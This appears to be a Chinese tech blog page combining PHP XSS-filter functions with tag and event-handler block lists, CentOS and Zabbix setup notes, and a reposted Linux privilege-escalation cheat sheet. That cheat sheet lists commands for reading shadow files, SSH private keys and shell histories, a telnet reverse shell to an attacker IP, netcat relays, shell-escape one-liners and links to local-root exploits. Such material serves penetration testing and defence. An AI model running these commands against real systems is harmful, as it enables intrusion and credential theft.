#陆续更新中
#iproute2 介绍
iproute2是一个linux下管理控制 TCP/IP 网络和流量控制的工具包,用以替代老的arp、ifconfig、route。目前由 Stephen Hemminger <shemminger@osdl.org>维护,原作者为Alexey Kuznetsov,原作者是linux内核中Qos实现作者。
PHP通用的XSS攻击过滤函数,Discuz系统中 防止XSS漏洞攻击,过滤HTML危险标签属性的PHP函数
流传的移除XSS攻击的php函数
The goal of this function is to be a generic function that can be used to parse almost any input and render it XSS safe. For more information on actual XSS attacks, check out http://ha.ckers.org/xss.html. Another excellent site is the XSS Database which details each attack and how it works.
<?php
/**
* Usage: Run *every* variable passed in through it.
* The goal of this function is to be a generic function that can be used to
* parse almost any input and render it XSS safe. For more information on
* actual XSS attacks, check out http://ha.ckers.org/xss.html. Another
* excellent site is the XSS Database which details each attack and how it
* works.
*
* Used with permission by the author.
* URL: http://quickwired.com/smallprojects/php_xss_filter_function.php
*
* License:
* This code is public domain, you are free to do whatever you want with it,
* including adding it to your own project which can be under any license.
*
* $Id: RemoveXSS.php 2663 2007-11-05 09:22:23Z ingmars $
*
* @author Travis Puderbaugh <kallahar@quickwired.com>
* @package RemoveXSS
*/
class RemoveXSS {
/**
* Wrapper for the RemoveXSS function.
* Removes potential XSS code from an input string.
*
* Using an external class by Travis Puderbaugh <kallahar@quickwired.com>
*
* @param string Input string
* @return string Input string with potential XSS code removed
*/
function RemoveXSS($val) {
// remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed
// this prevents some character re-spacing such as <java\0script>
// note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs
$val = preg_replace('/([\x00-\x08][\x0b-\x0c][\x0e-\x20])/', '', $val);
// straight replacements, the user should never need these since they're normal characters
// this prevents like <IMG SRC=@avascript:alert('XSS')>
$search = 'abcdefghijklmnopqrstuvwxyz';
$search.= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
$search.= '1234567890!@#$%^&*()';
$search.= '~`";:?+/={}[]-_|\'\\';
for ($i = 0; $i < strlen($search); $i++) {
// ;? matches the ;, which is optional
// 0{0,7} matches any padded zeros, which are optional and go up to 8 chars
// @ @ search for the hex values
$val = preg_replace('/(&#[x|X]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;
// @ @ 0{0,7} matches '0' zero to seven times
$val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;
}
// now the only remaining whitespace attacks are \t, \n, and \r
$ra1 = array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base');
$ra2 = array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');
$ra = array_merge($ra1, $ra2);
$found = true; // keep replacing as long as the previous round replaced something
while ($found == true) {
$val_before = $val;
for ($i = 0; $i < sizeof($ra); $i++) {
$pattern = '/';
for ($j = 0; $j < strlen($ra[$i]); $j++) {
if ($j > 0) {
$pattern .= '(';
$pattern .= '(&#[x|X]0{0,8}([9][a][b]);?)?';
$pattern .= '|(�{0,8}([9][10][13]);?)?';
$pattern .= ')?';
}
$pattern .= $ra[$i][$j];
}
$pattern .= '/i';
$replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag
$val = preg_replace($pattern, $replacement, $val); // filter out the hex tags
if ($val_before == $val) {
// no replacements were made, so exit the loop
$found = false;
}
}
}
return $val;
}
}
?>
Discuz系统中 防止XSS漏洞攻击,过滤HTML危险标签属性的PHP函数
//屏蔽html
function checkhtml($html) {
$html = stripslashes($html);
if(!checkperm('allowhtml')) {
preg_match_all("/<([^<]+)>/is", $html, $ms);
$searchs[] = '<';
$replaces[] = '<';
$searchs[] = '>';
$replaces[] = '>';
if($ms[1]) {
$allowtags = 'img|a|font|div|table|tbody|caption|tr|td|th|br
|p|b|strong|i|u|em|span|ol|ul|li|blockquote
|object|param|embed';//允许的标签
$ms[1] = array_unique($ms[1]);
foreach ($ms[1] as $value) {
$searchs[] = "<".$value.">";
$value = shtmlspecialchars($value);
$value = str_replace(array('\','/*'), array('.','/.'), $value);
$skipkeys = array(
'onabort','onactivate','onafterprint','onafterupdate',
'onbeforeactivate','onbeforecopy','onbeforecut',
'onbeforedeactivate','onbeforeeditfocus','onbeforepaste',
'onbeforeprint','onbeforeunload','onbeforeupdate',
'onblur','onbounce','oncellchange','onchange',
'onclick','oncontextmenu','oncontrolselect',
'oncopy','oncut','ondataavailable',
'ondatasetchanged','ondatasetcomplete','ondblclick',
'ondeactivate','ondrag','ondragend',
'ondragenter','ondragleave','ondragover',
'ondragstart','ondrop','onerror','onerrorupdate',
'onfilterchange','onfinish','onfocus','onfocusin',
'onfocusout','onhelp','onkeydown','onkeypress',
'onkeyup','onlayoutcomplete','onload',
'onlosecapture','onmousedown','onmouseenter',
'onmouseleave','onmousemove','onmouseout',
'onmouseover','onmouseup','onmousewheel',
'onmove','onmoveend','onmovestart','onpaste',
'onpropertychange','onreadystatechange','onreset',
'onresize','onresizeend','onresizestart',
'onrowenter','onrowexit','onrowsdelete',
'onrowsinserted','onscroll','onselect',
'onselectionchange','onselectstart','onstart',
'onstop','onsubmit','onunload','javascript',
'script','eval','behaviour','expression',
'style','class'
);
$skipstr = implode('|', $skipkeys);
$value = preg_replace(array("/($skipstr)/i"), '.', $value);
if(!preg_match("/^[/|s]?($allowtags)(s+|$)/is", $value)) {
$value = '';
}
$replaces[] = empty($value)?'':"<".str_replace('"', '"', $value).">";
}
}
$html = str_replace($searchs, $replaces, $html);
}
$html = addslashes($html);
return $html;
}
Centos7.x使用相关笔记
centos7没有ifconfig怎么看ip?
ip addr #看网卡接口和ip
ip addr add 10.8.8.2.24 dev 网卡名 #临时加ip
centos7没有netstat怎么看网络连接?
ss -ano #看网络连接状态
ss -anl #看网络监听状态
centos7怎么看某个tcp端口是什么进程开的,这个进程的pid是多少?
lsof -i:22 #看tcp22端口
centos7用systemd替换了SysV没有service了改用systemctl后怎么看当前的服务项?
systemctl list-unit-files |grep enabled #查看当前启用的服务。
systemctl disable 服务名称 #禁止某服务
centos7 怎么打开http tcp 80端口?
firewall-cmd --zone=public --add-port=80/tcp --permanent firewall-cmd --reload
[转] 史上最全Linux提权后获取敏感信息方法
(Linux)的提权是怎么一回事:
收集 – 枚举,枚举和一些更多的枚举。 过程 – 通过数据排序,分析和确定优先次序。 搜索 – 知道搜索什么和在哪里可以找到漏洞代码。 适应 – 自定义的漏洞,所以它适合。每个系统的工作并不是每一个漏洞“都固定不变”。 尝试 – 做好准备,试验和错误。
系统类型
系统是什么版本?
cat /etc/issue cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-release
它的内核版本是什么?
cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz
它的环境变量里有些什么?
cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set
是否有台打印机?
lpstat -a
应用与服务
正在运行什么服务?什么样的服务具有什么用户权限?
ps aux ps -ef top cat /etc/service
哪些服务具有root的权限?这些服务里你看起来那些有漏洞,进行再次检查!
ps aux | grep root ps -ef | grep root
安装了哪些应用程序?他们是什么版本?哪些是当前正在运行的?
ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/
Service设置,有任何的错误配置吗?是否有任何(脆弱的)的插件?
cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/
主机上有哪些工作计划?
crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root
主机上可能有哪些纯文本用户名和密码?
grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
通信与网络
NIC(s),系统有哪些?它是连接到哪一个网络?
/sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network
网络配置设置是什么?网络中有什么样的服务器?DHCP服务器?DNS服务器?网关?
cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname
其他用户主机与系统的通信?
lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w
缓存?IP和/或MAC地址?
arp -e route /sbin/route -nee
数据包可能嗅探吗?可以看出什么?监听流量
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port] tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21
你如何get一个shell?你如何与系统进行交互?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/ nc -lvp 4444 # Attacker. 输入 (命令) nc -lvp 4445 # Attacker. 输出(结果) telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # 在目标系统上. 使用 攻击者的IP!
如何端口转发?(端口重定向)
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch
# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP] FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
#ssh
# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip] ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
#mknod
# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
mknod
backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
建立隧道可能吗?本地,远程发送命令
ssh -D 127.0.0.1:9050 -N [username]@[ip] proxychains ifconfig
秘密信息和用户
你是谁?哪个id登录?谁已经登录?还有谁在这里?谁可以做什么呢?
id
who
w
last
cat /etc/passwd | cut -d: # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
可以找到什么敏感文件?
cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/
什么有趣的文件在home/directorie(S)里?如果有权限访问
ls -ahlR /root/ ls -ahlR /home/
是否有任何密码,脚本,数据库,配置文件或日志文件?密码默认路径和位置
cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg
用户做过什么?是否有任何密码呢?他们有没有编辑什么?
cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history
可以找到什么样的用户信息
cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root
private-key 信息能否被发现?
cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key
文件系统
哪些用户可以写配置文件在/ etc /?能够重新配置服务?
ls -aRl /etc/ | awk ‘$1 ~ /^.*w.*/' 2>/dev/null # Anyone ls -aRl /etc/ | awk ’$1 ~ /^..w/' 2>/dev/null # Owner ls -aRl /etc/ | awk ‘$1 ~ /^.....w/' 2>/dev/null # Group ls -aRl /etc/ | awk ’;$1 ~ /w.$/' 2>/dev/null # Other find /etc/ -readable -type f 2>/dev/null # Anyone find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
在/ var /有什么可以发现?
ls -alh /var/log ls -alh /var/mail ls -alh /var/spool ls -alh /var/spool/lpd ls -alh /var/lib/pgsql ls -alh /var/lib/mysql cat /var/lib/dhcp3/dhclient.leases
网站上的任何隐藏配置/文件?配置文件与数据库信息?
ls -alhR /var/www/ ls -alhR /srv/www/htdocs/ ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ ls -alhR /var/www/html/
有什么在日志文件里?(什么能够帮助到“本地文件包含”?)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/ cat /etc/httpd/logs/access_log cat /etc/httpd/logs/access.log cat /etc/httpd/logs/error_log cat /etc/httpd/logs/error.log cat /var/log/apache2/access_log cat /var/log/apache2/access.log cat /var/log/apache2/error_log cat /var/log/apache2/error.log cat /var/log/apache/access_log cat /var/log/apache/access.log cat /var/log/auth.log cat /var/log/chttp.log cat /var/log/cups/error_log cat /var/log/dpkg.log cat /var/log/faillog cat /var/log/httpd/access_log cat /var/log/httpd/access.log cat /var/log/httpd/error_log cat /var/log/httpd/error.log cat /var/log/lastlog cat /var/log/lighttpd/access.log cat /var/log/lighttpd/error.log cat /var/log/lighttpd/lighttpd.access.log cat /var/log/lighttpd/lighttpd.error.log cat /var/log/messages cat /var/log/secure cat /var/log/syslog cat /var/log/wtmp cat /var/log/xferlog cat /var/log/yum.log cat /var/run/utmp cat /var/webmin/miniserv.log cat /var/www/logs/access_log cat /var/www/logs/access.log ls -alh /var/lib/dhcp3/ ls -alh /var/log/postgresql/ ls -alh /var/log/proftpd/ ls -alh /var/log/samba/ #
auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info,
mail.log, mail.warn, messages, syslog, udev, wtmp(有什么文件?log.系统引导……)
如果命令限制,你可以打出哪些突破它的限制?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
如何安装文件系统?
mount df -h
是否有挂载的文件系统?
cat /etc/fstab
什么是高级Linux文件权限使用?Sticky bits, SUID 和GUID
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done #
Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin,
/usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID
(Quicker search)
#
findstarting at root (/), SGIDorSUID, not Symbolic links, only 3
folders deep, list with more detail and hideany errors (e.g. permission
denied)
find/-perm -g=s-o-perm -4000! -type l-maxdepth 3 -exec ls -ld {} ;2>/dev/null
在哪些目录可以写入和执行呢?几个“共同”的目录:/ tmp目录,/var / tmp目录/ dev /shm目录
find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o+w -type d 2>/dev/null # world-writeable folders find / -perm -o+x -type d 2>/dev/null # world-executable folders find / ( -perm -o+w -perm -o+x ) -type d 2>/dev/null # world-writeable & executable folders Any "problem" files?可写的的,“没有使用"的文件 find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print # world-writeable files find /dir -xdev ( -nouser -o -nogroup ) -print # Noowner files
准备和查找漏洞利用代码
安装了什么开发工具/语言/支持?
find / -name perl* find / -name python* find / -name gcc* find / -name cc
如何上传文件?
find / -name wget find / -name nc* find / -name netcat* find / -name tftp* find / -name ftp
查找exploit代码
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com
查找更多有关漏洞的信息
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]]http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]]http://www.vulnview.com/cve-details.php?cvename=[CVE]
http://www.91ri.org/
(快速)“共同的“exploit,预编译二进制代码文件
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
上面的信息很难吗?
快去使用第三方脚本/工具来试试吧!
系统怎么打内核,操作系统,所有应用程序,插件和Web服务的最新补丁?
apt-get update && apt-get upgrade yum update
服务运行所需的最低的权限?
例如,你需要以root身份运行MySQL?
能够从以下网站找到自动运行的脚本?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net
(快速)指南和链接
例如
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm
其他
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html
文章中文来源: http://www.91ri.org/7459.html
英文原文:http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
好玩的视频2个 《程序员 猿泡沫》 《我是一段死代码》
《程序员 猿泡沫》
《我是一段死代码》
Centos6.x已有LNMP环境下编译安装Zabbix2.2
#安装依赖库 yum -y install mysql-devel libcurl-devel net-snmp-devel Percona-Server-devel-55 #因为我的mysql使用的是percona55 所以这里需要装 Percona-Server-devel-55 #给zabbix在mysql中创建库和用户 create database zabbix character set utf8; grant all privileges on zabbix.* to zabbix@localhost identified by 'zabbix'; #创建zabbix运行的独立用户 groupadd zabbix useradd zabbix -g zabbix -s /sbin/nologin #下载编译安装zabbix wget -O zabbix.tar.gz -c "http://sourceforge.net/projects/zabbix/files/ZABBIX%20Latest%20Stable/2.2.4/zabbix-2.2.4.tar.gz/download" tar zxvf zabbix.tar.gz cd zabbix-2.2.4/ ./configure --prefix=/usr/local/zabbix --enable-server --enable-agent \ --with-mysql --with-net-snmp --with-libcurl make install ##编译错误解决 #checking for mysql_config... /usr/bin/mysql_config #checking for main in -lmysqlclient... no #configure: error: Not found mysqlclient library ln -s /usr/lib64/mysql/libmysqlclient.so.16.0.0 /usr/lib64/mysql/libmysqlclient.so ln -s /usr/lib64/mysql/libmysqlclient_r.so.16.0.0 /usr/lib64/mysql/libmysqlclient_r.so ln -s /usr/lib64/libmysqlclient.so.16.0.0 /usr/lib64/libmysqlclient.so ln -s /usr/lib64/libmysqlclient_r.so.16.0.0 /usr/lib64/libmysqlclient_r.so #导入zabbix的数据库 mysql -uzabbix -pzabbix -hlocalhost zabbix < database/mysql/schema.sql mysql -uzabbix -pzabbix -hlocalhost zabbix < database/mysql/images.sql mysql -uzabbix -pzabbix -hlocalhost zabbix < database/mysql/data.sql #修改配置文件 cp misc/init.d/fedora/core/zabbix_server /etc/init.d/ cp misc/init.d/fedora/core/zabbix_agentd /etc/init.d/ cp -R frontends/php /data/wwwroot/zabbix #复制web文件到网站目录,替换成你自己的 sed -i 's/^DBUser=.*$/DBUser=zabbix/g' /usr/local/zabbix/etc/zabbix_server.conf sed -i 's/^.*DBPassword=.*$/DBPassword=zabbix/g' /usr/local/zabbix/etc/zabbix_server.conf sed -i 's/BASEDIR=\/usr\/local/BASEDIR=\/usr\/local\/zabbix/g' /etc/init.d/zabbix_server sed -i 's/BASEDIR=\/usr\/local/BASEDIR=\/usr\/local\/zabbix/g' /etc/init.d/zabbix_agentd #增加服务端口<br> cat >>/etc/services <<EOF zabbix-agent 10050/tcp #Zabbix Agent zabbix-agent 10050/udp #Zabbix Agent zabbix-trapper 10051/tcp #Zabbix Trapper zabbix-trapper 10051/udp #Zabbix Trapper EOF #启动服务 /etc/init.d/zabbix_server start /etc/init.d/zabbix_agentd start chkconfig zabbix_server on #开机启动启动服务 #chkconfig zabbix_agentd on #被控端 #echo "/etc/init.d/zabbix_server start" >> /etc/rc.local #echo "/etc/init.d/zabbix_agentd start" >> /etc/rc.local
问题处理
zabbix_server 不能监听端口tcp 10051 ?
打开日志 cat /tmp/zabbix_server.log
1635:20140706:015834.413 [Z3001] connection to database ‘zabbix’ failed: [2002] Can’t connect to local MySQL server through socket ‘/var/lib/mysql/mysql.sock’ (2)
1635:20140706:015834.413 Database is down. Reconnecting in 10 seconds.
看来是mysql sock错误了。 找到 #DBSocket=/tmp/mysql.sock 去掉前面的#注释即可。
zabbix2.2.4 web中 语言没有中文可选?
1、服务器端找到 zabbix/include/ locales.inc.php 文件
2、修改 locales.inc.php内容为:’zh_CN’ => array(‘name’ => _(‘Chinese (zh_CN)’), ‘display’ => true),
默认是false,所以不显示Chinese(zh_CN)。保存退出。